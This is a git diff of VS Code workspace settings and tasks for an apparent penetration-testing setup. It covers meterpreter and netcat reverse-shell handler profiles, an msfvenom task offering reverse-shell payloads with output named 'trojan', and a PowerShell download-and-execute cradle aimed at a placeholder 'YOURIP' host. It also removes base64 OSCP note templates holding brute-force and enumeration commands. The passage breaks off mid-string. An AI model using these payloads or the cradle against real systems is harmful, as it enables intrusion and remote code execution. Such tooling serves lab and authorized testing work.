"euskadi31.json-pretty-printer", // json pretty printer "ryu1kn.edit-with-shell", // Edit file or selection with any shell command like sort -rn or uniq - //////////////////////////////////////////////////////////////// // Language supports //////////////////////////////////////////////////////////////// @@ -21,10 +19,10 @@ "icsharpcode.ilspy-vscode", // c# decompiler // Python "ms-python.python", // ms python supports - "donjayamanne.python-environment-manager", // python environment/packages manager + "ms-python.vscode-python-envs", // python environment/packages manager // Golang "golang.go", // golang support - + "foxundermoon.shell-format", // shell formatter //////////////////////////////////////////////////////////////// // Protocol supports //////////////////////////////////////////////////////////////// @@ -35,7 +33,6 @@ // "rpdswtk.vsmqtt", // MQTT support // "Dancheg97.grpc-clicker", // gRPC support "cweijan.vscode-office", // documents support + http request sender - //////////////////////////////////////////////////////////////// // Custom Favorites //////////////////////////////////////////////////////////////// @@ -43,4 +40,4 @@ "ms-vscode-remote.vscode-remote-extensionpack" // remote extension pack // "mhutchie.git-graph", // git graph ] -} \ No newline at end of file +} diff --git a/.vscode/settings.json b/.vscode/settings.json index 38c7dc5..067a269 100644 --- a/.vscode/settings.json +++ b/.vscode/settings.json @@ -2,9 +2,10 @@ "terminal.integrated.profiles.linux": { "zsh-shell": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}" + "PROJECT_FOLDER": "${workspaceFolder}", + "SHOW_CURRENT_STATUS": "True" }, - "path": "zsh", + "path": "zsh" }, "meterpreter-handler": { "overrideName": true, @@ -12,7 +13,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_HANDLER_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "msfconsole": { "overrideName": true, @@ -20,7 +21,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_CONSOLE_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "netcat-handler": { "overrideName": true, @@ -28,7 +29,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "REVERSE_SHELL_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "web-delivery": { "overrideName": true, @@ -36,15 +37,16 @@ "PROJECT_FOLDER": "${workspaceFolder}", "WEB_DELIVERY_MODE": "True" }, - "path": "zsh", - }, + "path": "zsh" + } }, "terminal.integrated.profiles.osx": { "zsh-shell": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}" + "PROJECT_FOLDER": "${workspaceFolder}", + "SHOW_CURRENT_STATUS": "True" }, - "path": "zsh", + "path": "zsh" }, "meterpreter-handler": { "overrideName": true, @@ -52,7 +54,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_HANDLER_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "msfconsole": { "overrideName": true, @@ -60,7 +62,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_CONSOLE_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "netcat-handler": { "overrideName": true, @@ -68,7 +70,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "REVERSE_SHELL_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "web-delivery": { "overrideName": true, @@ -76,7 +78,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "WEB_DELIVERY_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "kali-orbstack": { "overrideName": true, @@ -93,10 +95,10 @@ "terminal.integrated.defaultProfile.osx": "zsh-shell", "terminal.integrated.defaultProfile.linux": "zsh-shell", "terminal.integrated.automationProfile.osx": { - "path": "zsh", + "path": "zsh" }, "terminal.integrated.automationProfile.linux": { - "path": "zsh", + "path": "zsh" }, "files.associations": { "*.nuclei": "yaml" @@ -104,7 +106,7 @@ "yaml.schemas": { "https://raw.githubusercontent.com/projectdiscovery/nuclei/main/nuclei-jsonschema.json": [ "*.nuclei", - "*nuclei.yaml", + "*nuclei.yaml" ] - }, + } } \ No newline at end of file diff --git a/.vscode/tasks.json b/.vscode/tasks.json index bb9cbb7..999301b 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -2,7 +2,7 @@ "version": "2.0.0", "options": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}", + "PROJECT_FOLDER": "${workspaceFolder}" } }, "tasks": [ @@ -12,7 +12,7 @@ "detail": "msfvenom payload creating task", "problemMatcher": [], "command": [ - "source ${workspaceFolder}/.vscode/.zshrc;", // source shell config + "source ${workspaceFolder}/.vscode/.zshrc;", "msfvenom", "-p", "${input:msfvenom-payload}", @@ -57,32 +57,15 @@ "command": [ "source ${workspaceFolder}/.vscode/.zshrc;", "echo '================ ADDING THIS LINE IN FILE ========';", - "echo ${RHOST} ${DOMAIN};", + "dump_hosts;", "echo '================================================';", - "sudo", - "vim", - "/etc/hosts" + "echo 'Press Enter key to continue';", + "read;", + "sudo vim /etc/hosts" ], "isBackground": false, "problemMatcher": [] }, - { - "label": "Encoder/Decoder", - "command": [ - "${input:visit-cyberchef}" - ], - "problemMatcher": [] - }, - { - "label": "OSCP exam style note template", - "type": "shell", - "detail": "OSCP exam style note template task, you can use this to create a note file for the exam or other lab.", - "command": [ - "echo ${input:note-template-type}|base64 -d > ${input:note-filename}", - "\n# fileSource: https://github.com/0prrr/OSCP-Note-Template", - ], - "problemMatcher": [] - }, { "label": "service account token kubeconfig generation", "type": "shell", @@ -129,17 +112,27 @@ "-- ${input:nmap-args}" ], "problemMatcher": [] + }, + { + "label": "run command with selection", + "type": "shell", + "detail": "Run command with selection in the terminal", + "command": [ + "source ${workspaceFolder}/.vscode/.zshrc; ", + "echo 'Running command with selection:';", + "echo 'Press Enter key to continue or Ctrl-C to cancal';", + "read;", + "${selectedText}" + ], + "problemMatcher": [] } ], "inputs": [ - // msfvenom { "id": "msfvenom-payload", "type": "pickString", "description": "Select the payload", "options": [ - // Order with the most used payloads first - // Staged first, better stageless "windows/x64/meterpreter/reverse_tcp", "windows/meterpreter/reverse_tcp", "linux/x64/meterpreter/reverse_tcp", @@ -150,7 +143,7 @@ "windows/x64/meterpreter/reverse_http", "windows/meterpreter/reverse_https", "windows/x64/meterpreter/reverse_https", - "java/meterpreter/reverse_tcp", + "java/meterpreter/reverse_tcp" ] }, { @@ -158,8 +151,6 @@ "type": "pickString", "description": "Select the format of the payload", "options": [ - // executable first, script second, web hta third - // "# DONOT Choose this.(psh is powershell script with loader,raw is used for python java php pyloads)", "exe", "elf", "psh # psh is powershell payload with loader using `IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:80/.ps1');` to load in memory ", @@ -183,20 +174,20 @@ "vba", "vba-exe", "vba-psh", - "vbs", + "vbs" ] }, { "id": "msfvenom-lhost", "type": "promptString", "description": "Enter the LHOST, default will read the env.zsh configurated variable $LHOST", - "default": "$LHOST", + "default": "$LHOST" }, { "id": "msfvenom-lport", "type": "promptString", "description": "Enter the LPORT", - "default": "6789", + "default": "6789" }, { "id": "msfvenom-payload-advanced-options", @@ -208,51 +199,31 @@ "PrependMigrate=true PrependMigrateProc=explorer.exe", "PrependFork=true", "PrependSetuid=true", - "PrependSetuid=true PrependFork=true", + "PrependSetuid=true PrependFork=true" ] }, { "id": "msfvenom-output", "type": "promptString", "description": "Enter the output filename. if you put /dev/stdout here, the output will be printed to the terminal", - "default": "${workspaceFolder}/trojan", - }, - // note-templates - { - "id": "note-template-type", - "type": "pickString", - "description": "Select the note template type. First one is Linux, Second one is Windows", - "options": [ - "IyBMaW51eCBUZW1wbGF0ZQoKIyBPdmVydmlldwoKLSBPUwogICAgCiAgICBgYGAKICAgICMgUmVzdWx0OgogICAgCiAgICBgYGAKICAgIAotIE92ZXJhbGwgVHlwZQogICAgLSAKICAgIAotIENyZWRzCiAgICAKICAgIGBgYAogICAgIyBSZXN1bHQ6CiAgICAKICAgIGBgYAogICAgCgojIFByb29mIEZpbGVzCgojIyBMb2NhbCBwcm9vZgoKYGBgCiMgUmVzdWx0OgoKYGBgCgpTY3JlZW5zaG90OgoKCgojIyBTeXN0ZW0gcHJvb2YKCmBgYAojIFJlc3VsdDoKCmBgYAoKU2NyZWVuc2hvdDoKCgojIEVudW1lcmF0aW9uCgp8IFBvcnRzIE9wZW4gfCAgfAp8IC0tLSB8IC0tLSB8CgojIyBGVFAgUG9ydCAyMQoKVHJ5IGRlZmF1bHQgY3JlZGVudGlhbHMuIGFub255bW91cz8gZ3Vlc3Q6Z3Vlc3Q/IGFkbWluOmFkbWluPyByb290OnJvb3Q/CgpCYW5uZXIKCmBgYAojIFJlc3VsdDoKCmBgYAoKTm1hcCBzY3JpcHQgc2NhbgoKYGBgCiMgUmVzdWx0OgoKYGBgCgpCcnV0ZSBmb3JjZQoKYGBgCmh5ZHJhIC1DIC91c3Ivc2hhcmUvc2VjbGlzdHMvUGFzc3dvcmRzL0RlZmF1bHQtQ3JlZGVudGlhbHMvZnRwLWJldHRlcmRlZmF1bHRwYXNzbGlzdC50eHQgZnRwIC12ViAtZgoKIyBSZXN1bHQ6CgpgYGAKCkNhbiB1cGxvYWQgZmlsZT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKUHViaWMgdnVsbmVyYWJpbGl0eT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgU1NIIFBvcnQgMjIKCkJhbm5lci4gSXMgdGhlIHZlcnNpb24gdnVsbmVyYWJsZT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKQWRkaXRpb25hbCBpbmZvIChzc2ggcm9vdEBpcCkKCmBgYAojIFJlc3VsdDoKCmBgYAoKVXNlciBuYW1lIGZvdW5kPyBUcnkgbWFjaGluZSBuYW1lPyB1c2VybmFtZTp1c2VybmFtZT8gdXNlcm5hbWU6aG9zdG5hbWU/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFNNVFAgUG9ydCAyNQoKQmFubmVyCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCk5tYXAgc2NyaXB0IHNjYW4KCmBgYAojIFJlc3VsdDoKCmBgYAoKR290IHVzZXJuYW1lcz8gVXNlcm5hbWUgZW51bT8KCmBgYAojIGdlbmVyYXRlIHVzZXJuYW1lcyBmaXJzdCB3aXRoIHVzZXJuYW1lci5weQoKIyBzbXRwLXVzZXItZW51bQoKIyBkb24ndCBmb3JnZXQgdXNlcm5hbWUgYXMgcGFzc3dvcmQKCiMgUmVzdWx0OgoKYGBgCgpQdWJsaWMgdnVsbmVyYWJpbGl0eT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgRE5TIChPcHRpb25hbCkKClN1YmRvbWFpbnM/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKClpvbmUgVHJhbnNmZXI/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIEhUVFAgUG9ydCA4MAoKIyMjIEhvbWUgUGFnZSAoQSBzY3JlZW5zaG90IHdpbGwgZG8pCgojIyMgTmVlZCBpbmZvIGZvciBicnV0ZSBmb3JjaW5nPyBET07igJlUIEZPUkdFVCBjZXdsISEhCgojIyMgVGhpcmQgUGFydHkgV2ViIEFwcD8gUHVibGljIFZ1bG5lcmFiaWxpdHk/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyByb2JvdHMudHh0CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBkaXJiL2dvYnVzdGVyIChjb21tb24udHh0LCBkaXJidXN0ZXItbWVkaXVtLnR4dCkKCmBgYAojIFJlc3VsdDoKCmBgYAoKV2l0aCBkb21haW4gbmFtZT8gdmhvc3Q/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBCYWNrZW5kIFRlY2hzdGFjay93aGF0d2ViCgpgYGAKd2hhdHdlYiAtYSAzIGh0dHA6Ly9pcAoKIyBSZXN1bHQ6CgpgYGAKCiMjIyA0MDMKClNpbXBsZSBCeXBhc3M/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyA0MDQKCkFueSBpbnRlcmVzdGluZyBpbmZvcm1hdGlvbj8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIGluZGV4Lmh0bWwvcGhwPyAoZ29idXN0ZXIgd2l0aCAteCkKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIFNvdXJjZSBDb2RlCgpBbnl0aGluZyBpbnRlcmVzdGluZz8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIEJ1cnAgVHJhZmZpYwoKYGBgCiMgUmVzdWx0OgoKYGBgCgpDb21tYW5kIGluamVjdGlvbj8gQ2hhbmdlIHJlcXVlc3QgbWV0aG9kPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgbmlrdG8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIEFwYWNoZT8gY2dpLWJpbj8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIENoZWNrIENvb2tpZXMKCkFueXRoaW5nIGludGVyZXN0aW5nPyBCYXNlNjQ/IEpXVD8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIFVzZXIgSW5wdXQgRmllbGRzPyBTUUxpPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgpDYW4geW91IGxvY2sgdGhlIGFjY291bnQgb3V0PwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgcGhwaW5mbygpPwoKU2VydmVyIGRvY3VtZW50IHJvb3QKCmBgYAojIFJlc3VsdDoKCmBgYAoKdXJsIG9wZW4gc2V0dGluZ3MKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIExGST9SRkk/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBVc2VycyBmb3VuZD8gU1NIIG9wZW4/IEJydXRlIGZvcmNlPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBJZGVudCBQb3J0IDExMwoKSWRlbnRpZnkgdXNlcm5hbWUKCmBgYAppZGVudC11c2VyLWVudW0gPHRhcmdldC1pcD4gPHBvcnQtbGlzdD4KCiMgUmVzdWx0OgoKYGBgCgojIyBTTUIgUG9ydCAxMzksIDQ0NQoKTnVsbCBzZXNzaW9uPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgpDYW4gbGlzdCBzaGFyZXM/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCk5tYXAgc2NyaXB0IHNjYW46CgpgYGAKIyBSZXN1bHQ6CgpgYGAKClZlcnNpb24gPCAyLjIuOD8gQ2Fubm90IGdldCB2ZXJzaW9uPyBUcnkgd2lyZXNoYXJrPyBbaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTBdKGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEwKQoKYGBgCiMgUmVzdWx0OgoKYGBgCgplbnVtNGxpbnV4CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkFub255bW91cyBsb2dpbj8KCmBgYAojIFJlc3VsdDoKCmBgYAoKRmlsZXMKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgTXlTUUwgUG9ydCAzMzA2CgpCYW5uZXIKCmBgYAojIFJlc3VsdDoKCmBgYAoKTm1hcCBzY3JpcHQgc2NhbgoKYGBgCiMgUmVzdWx0OgoKYGBgCgpEZWZhdWx0IGNyZWRlbnRpYWw6CgpgYGAKcm9vdDooZW1wdHkpCnJvb3Q6cm9vdAoKIyBSZXN1bHQ6CgpgYGAKCkJydXRlIGZvcmNlPz8/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFBvc3RncmVzcWwgUG9ydCA1NDMyCgpEZWZhdWx0IGNyZWRlbnRpYWw6CgpgYGAKcG9zdGdyZXM6cG9zdGdyZXMKcG9zdGdyZXM6KGVtcHR5KQoKIyBSZXN1bHQ6CmBgYAoKCiMgUHJpdmlsZWdlIEVzY2FsYXRpb24KCiMjIHdob2FtaQoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBpZAoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBob3N0bmFtZQoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyB1bmFtZSAtYQoKYGBgCiMgUmVzdWx0OgoKYGBgCgoKIyMgL2V0Yy9wYXNzd2QKCmBgYApncmVwIC12RSAibm9sb2dpbnxmYWxzZSIgL2V0Yy9wYXNzd2Q7bHMgLWFsIC9ldGMvcGFzc3dkCgojIFJlc3VsdDoKCmBgYAoKVXNlcnMgb24gdGFyZ2V0CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCi9ldGMvcGFzc3dkIGZpbGUgcGVybWlzc2lvbgoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyAvZXRjL3NoYWRvdwoKL2V0Yy9zaGFkb3cgZmlsZSBwZXJtaXNzaW9uCgpgYGAKbHMgLWFsIC9ldGMvc2hhZG93CgojIFJlc3VsdDoKCmBgYAoKIyMgY2F0IC9ldGMvKi1yZWxlYXNlCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBTU0ggbW90ZCBpbmZvCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIGVudgoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBzdWRvIHZlcnNpb24KCmBgYApzdWRvIC1WCgojIFJlc3VsdDoKYGBgCgojIyBzdWRvIC1sCgpgYGAKc3VkbyAtbAoKIyBSZXN1bHQ6CgpgYGAKCiMjIENyb250YWIKCkFueSBpbnRlcmVzdGluZyBQQVRIPwoKYGBgCmNhdCAvZXRjL2Nyb24qCgojIFJlc3VsdDoKCmBgYAoKIyMgUHJvY2Vzc2VzCgpgYGAKcHMgYXV4IHwgZ3JlcCByb290CgojIFJlc3VsdDoKCmBgYAoKIyMgZnN0YWIKCmBgYApjYXQgL2V0Yy9mc3RhYgoKIyBSZXN1bHQ6CgpgYGAKCiMjIFNVSUQKCmBgYApmaW5kIC8gLXBlcm0gLTA0MDAwIC10eXBlIGYgMj4vZGV2L251bGwKCiMgUmVzdWx0OgoKYGBgCgojIyBDYXBhYmlsaXR5CgpgYGAKZ2V0Y2FwIC1yIC8gMj4vZGV2L251bGwKCiMgUmVzdWx0OgoKYGBgCgoKCiMjIG5ldHN0YXQvc3MKCkNvbW1hbmQKCmBgYApuZXRzdGF0IC1hbnRscApzcyAtYW50bHAKCiMgUmVzdWx0OgoKYGBgCgojIyBXcml0YWJsZSBGaWxlcyAoZ3JlcCAtdiBmb3IgZmlsdGVyaW5nKQoKQ29tbWFuZAoKYGBgCmZpbmQgLyAtd3JpdGFibGUgLXR5cGUgZiAyPi9kZXYvbnVsbAoKIyBSZXN1bHQ6CgpgYGAKCiMjIFdyaXRhYmxlIERpcnMgKGdyZXAgLXYgZm9yIGZpbHRlcmluZykKCmBgYApmaW5kIC8gLXdyaXRhYmxlIC10eXBlIGQgMj4vZGV2L251bGwKCiMgUmVzdWx0OgoKYGBgCgoKIyMgSG9tZSBEaXIgRmlsZXMKCiMjIyBTaGVsbCBTY3JpcHQ/IFB5dGhvbj8gQW55IFNvdXJjZSBDb2RlIFdvcnRoIFJlYWRpbmc/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBiYXNoX2hpc3RvcnkKCmBgYApjYXQgfi8uYmFzaF9oaXN0cm95CgojIFJlc3VsdDoKCmBgYAoKIyMjIC5zc2gKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIFdlYiBzZXJ2ZXIgbG9nIGZpbGVzPyBUcmFmZmljIGNvbWUgZnJvbT8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgTGluUEVBcwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBQc3B5CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCjxiciAvPgo8YnIgLz4K", - "IyBXaW5kb3dzIFRlbXBsYXRlCgojIE92ZXJ2aWV3CgotIE9TCiAgICAKICAgIGBgYAogICAgIyBSZXN1bHQ6CiAgICAKICAgIGBgYAogICAgCi0gT3ZlcmFsbCBUeXBlCiAgICAtIAoKLSBDcmVkcwogICAgCiAgICBgYGAKICAgICMgUmVzdWx0OgogICAgCiAgICBgYGAKICAgIAoKIyBHZXQgdXNlciBwYXNzd29yZC9OVExNIGhhc2g/CgpUcnkgVGhlc2UKCmBgYApucHVzZXJzLCB1c2Vyc3BucywgYmxvb2Rob3VuZC1weXRob24sIHJwY2NsaWVudCwgY3JhY2ttYXBleGVjIHNtYiwgY3JhY2ttYXBleGVjIHdpbnJtLCBsZGFwc2VhcmNoLCBtb3VudCBzaGFyZS4KYGBgCgoKIyBQcm9vZiBGaWxlcwoKIyMgTG9jYWwgcHJvb2YKCmBgYAojIFJlc3VsdDoKCmBgYAoKU2NyZWVuc2hvdDoKCgoKIyMgU3lzdGVtIHByb29mCgpgYGAKIyBSZXN1bHQ6CgpgYGAKClNjcmVlbnNob3Q6CgoKCiMgRW51bWVyYXRpb24KCnwgUG9ydHMgT3BlbnwgIHwKfCAtLS0gfCAtLS0gfAoKIyMgRlRQIFBvcnQgMjEKClRyeSBkZWZhdWx0IGNyZWRlbnRpYWxzLiBhbm9ueW1vdXM/IGd1ZXN0Omd1ZXN0PyBhZG1pbjphZG1pbj8gcm9vdDpyb290PwoKQmFubmVyCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCk5tYXAgc2NyaXB0IHNjYW4KCmBgYAojIFJlc3VsdDoKCmBgYAoKQnJ1dGUgZm9yY2UKCmBgYApoeWRyYSAtQyAvdXNyL3NoYXJlL3NlY2xpc3RzL1Bhc3N3b3Jkcy9EZWZhdWx0LUNyZWRlbnRpYWxzL2Z0cC1iZXR0ZXJkZWZhdWx0cGFzc2xpc3QudHh0IGZ0cCAtdlYgLWYKCiMgUmVzdWx0OgoKYGBgCgpDYW4gdXBsb2FkIGZpbGU/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKClB1YmljIHZ1bG5lcmFiaWxpdHk/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIFNTSCBQb3J0IDIyCgpCYW5uZXIuIElzIHRoZSB2ZXJzaW9uIHZ1bG5lcmFibGU/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkFkZGl0aW9uYWwgaW5mbyAoc3NoIHJvb3RAaXApCgpgYGAKIyBSZXN1bHQ6CgpgYGAKClVzZXIgbmFtZSBmb3VuZD8gVHJ5IG1hY2hpbmUgbmFtZT8gdXNlcm5hbWU6dXNlcm5hbWU/IHVzZXJuYW1lOmhvc3RuYW1lPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyBTTVRQIFBvcnQgMjUKCkJhbm5lcgoKYGBgCiMgUmVzdWx0OgoKYGBgCgpObWFwIHNjcmlwdCBzY2FuCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkdvdCB1c2VybmFtZXM/IFVzZXJuYW1lIGVudW0/CgpgYGAKIyBnZW5lcmF0ZSB1c2VybmFtZXMgZmlyc3Qgd2l0aCB1c2VybmFtZXIucHkKCiMgc210cC11c2VyLWVudW0KCiMgZG9uJ3QgZm9yZ2V0IHVzZXJuYW1lIGFzIHBhc3N3b3JkCgojIFJlc3VsdDoKCmBgYAoKUHVibGljIHZ1bG5lcmFiaWxpdHk/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIEROUyBQb3J0IDUzCgpgYGAKZGlnIEBkYy1pcCBkb21haW4uY29tCgojIFJlc3VsdDoKCmBgYAoKem9uZSB0cmFuc2ZlcgoKYGBgCmRpZyBheGZyIEBkYy1pcCBkb21haW4uY29tCgojIFJlc3VsdDoKCmBgYAoKZG5zZW51bQoKYGBgCmRuc2VudW0gLS1kbnNzZXJ2ZXIgZGMtaXAgLS1lbnVtIGRvbWFpbi5jb20gLWYgL3Vzci9zaGFyZS9zZWNsaXN0cy9EaXNjb3ZlcnkvRE5TL2JpdHF1YXJrLXN1YmRvbWFpbnMtdG9wMTAwMDAwLnR4dCAtbyBkbnNlbnVtCgojIFJlc3VsdDoKCmBgYAoKIyMgVEZUUCBQb3J0IDY5CgpBbnkgaW50ZXJlc3RpbmcgZmlsZXMgd2UgY2FuIGRvd25sb2FkPwoKTXNzcWwgcHJlc2VudD8gbWFzdGVyLm1kZj8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMgUlBDIFBvcnQgMTM1CgpgYGAKIyBSZXN1bHQ6CgpgYGAKClNlcnZpY2UgYWNjb3VudHM/IFByaW50ZXJzPwoKYGBgCmVudW1wcmludGVycwoKIyBSZXN1bHQ6CgpgYGAKClVzZXJzPwoKYGBgCnF1ZXJ5dXNlcgoKIyBSZXN1bHQ6CgpgYGAKCmBgYAovb3B0L0lPWElEUmVzb2x2ZXIvSU9YSURSZXNvbHZlci5weSAtdCAxMC4xMS4xLjIyMQoKIyBSZXN1bHQ6CgpgYGAKCgoKIyMgTERBUCBQb3J0IDM4OSwgNjM2LCAzMjY4LCAzMjY5CgpuYW1pbmdjb250ZXh0cwoKYGBgCmxkYXBzZWFyY2ggLXggLXMgYmFzZSAtSCBsZGFwOi8vMTAuMTAuMTAuMTAgbmFtaW5nY29udGV4dHMKCiMgUmVzdWx0OgoKYGBgCgpDaGVjayBpZiBhdXRoIHJlcXVpcmVkCgpgYGAKbGRhcHNlYXJjaCAtaCBkb21haW4uY29tIC14IC1iICJEQz1kb21haW4sREM9Y29tIgoKIyBSZXN1bHQ6CgpgYGAKCkdldCB1c2VycyAoaWYgeW91IGNhbikKCmBgYApsZGFwc2VhcmNoIC14ICcoc2FtYWNjb3VudFR5cGU9ODA1MzA2MzY4KScgLWIgJ0RDPWh1dGNoLERDPW9mZnNlYycgLUggbGRhcDovLzE5Mi4xNjguMjQ1LjEyMiB8IGdyZXAgLWkgc2FtYWNjb3VudG5hbWUKCiMgUmVzdWx0OgoKYGBgCgoKRGVzY3JpcHRpb24gKGlmIHlvdSBjYW4pCgpgYGAKbGRhcHNlYXJjaCAteCAnKHNhbWFjY291bnRUeXBlPTgwNTMwNjM2OCknIC1iICdEQz1odXRjaCxEQz1vZmZzZWMnIC1IIGxkYXA6Ly8xOTIuMTY4LjI0NS4xMjIgfCBncmVwIC1pIGRlc2MKCiMgUmVzdWx0OgoKYGBgCgoKR2V0IG5wIHVzZXJzIChpZiB5b3UgY2FuKQoKYGBgCmltcGFja2V0LUdldE5QVXNlcnMgLWRjLWlwIDE5Mi4xNjguMTAuMTAgLW5vLXBhc3MgLXVzZXJzZmlsZSB1c2VyLmxzdCBkb21haW4uY29tLyAtZm9ybWF0IGhhc2hjYXQKCiMgUmVzdWx0OgoKYGBgCgojIyBTTUIgUG9ydCAxMzksIDQ0NQoKCk5tYXAgc2NyaXB0IHNjYW4KCmBgYAojIFJlc3VsdDoKCmBgYAoKY3JhY2ttYXBleGVjCgpgYGAKY3JhY2ttYXBleGVjIHNtYiAxMC4xMC4xMC4xMCAtdSAnd29vaG9vJyAtcCAnJyAtLXNoYXJlcwoKIyBSZXN1bHQ6CmBgYAoKc21iY2xpZW50CgpgYGAKc21iY2xpZW50IC1MIC8vaXAgLU4KCiMgUmVzdWx0OgpgYGAKClZlcnNpb24/IENhbm5vdCBnZXQgdmVyc2lvbj8gVHJ5IHdpcmVzaGFyaz8KCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMjIEhUVFAgUG9ydCA4MAoKIyMjIEhvbWUgUGFnZSAoQSBzY3JlZW5zaG90IHdpbGwgZG8pCgojIyMgTmVlZCBpbmZvIGZvciBicnV0ZSBmb3JjaW5nPyBET07igJlUIEZPUkdFVCBjZXdsISEhCgojIyMgVGhpcmQgUGFydHkgV2ViIEFwcD8gUHVibGljIFZ1bG5lcmFiaWxpdHk/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBJSVM/CgpDaGVjayB2ZXJzaW9uLiBbTGlua10oaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvSW50ZXJuZXRfSW5mb3JtYXRpb25fU2VydmljZXMjVmVyc2lvbnMpLgoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgcm9ib3RzLnR4dAoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgZGlyYi9nb2J1c3RlciAoY29tbW9uLnR4dCwgZGlyYnVzdGVyLW1lZGl1bS50eHQpCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBCYWNrZW5kIFRlY2hzdGFjay93aGF0d2ViCgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyA0MDMKClNpbXBsZSBCeXBhc3M/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyA0MDQKCkFueSBpbnRlcmVzdGluZyBlcnJvciBtZXNzYWdlcz8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIGluZGV4Lmh0bWwvcGhwPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgU291cmNlIENvZGUKCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIEJ1cnAgVHJhZmZpYwoKYGBgCiMgUmVzdWx0OgoKYGBgCgpDb21tYW5kIGluamVjdGlvbj8gQ2hhbmdlIHJlcXVlc3QgbWV0aG9kPwoKYGBgCiMgUmVzdWx0OgoKYGBgCgojIyMgbmlrdG8KCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMjIyBhcGFjaGU/IGNnaS1iaW4/IHdlYmRhdj8gSUlTOCBwYXRoIHRyYXZlcnNhbD8KCmBgYAojIFJlc3VsdDoKCmBgYAoKCiMjIyBMb2dpbiBDb29raWVzPyBCYXNlNjQ/IEpXVD8KCmBgYAojIFJlc3VsdDoKCmBgYAoKIyMjIFVzZXIgSW5wdXQgRmllbGRzPyBTUUxpPyBYU1M/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCkNhbiB5b3UgbG9jayB0aGUgYWNjb3VudCBvdXQ/CgpgYGAKIyBSZXN1bHQ6CgpgYGAKCiMjIyBwaHBpbmZvKCk/CgpTZXJ2ZXIgZG9jdW1lbnQgcm